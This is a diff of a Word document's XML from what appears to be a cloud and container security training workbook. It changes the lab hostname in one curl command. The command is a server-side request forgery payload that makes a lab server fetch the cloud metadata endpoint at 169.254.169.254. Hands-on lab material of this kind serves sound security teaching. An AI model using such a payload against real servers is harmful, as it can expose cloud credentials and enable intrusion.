--- a/contents/battle-workbook/cloud-container-w01.docx
+++ b/contents/battle-workbook/cloud-container-w01.docx
@@ -318,7 +318,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>curl -s -A "cc01r1-kim" -H "Host: admin.6v6.lab" "http://192.168.0.161/files/read?url=http://169.254.169.254/cc01r1-kim"</w:t>
+        <w:t>curl -s -A "cc01r1-kim" -H "Host: admin.el34.lab" "http://192.168.0.161/files/read?url=http://169.254.169.254/cc01r1-kim"</w:t>
       </w:r>
     </w:p>
     <w:p>
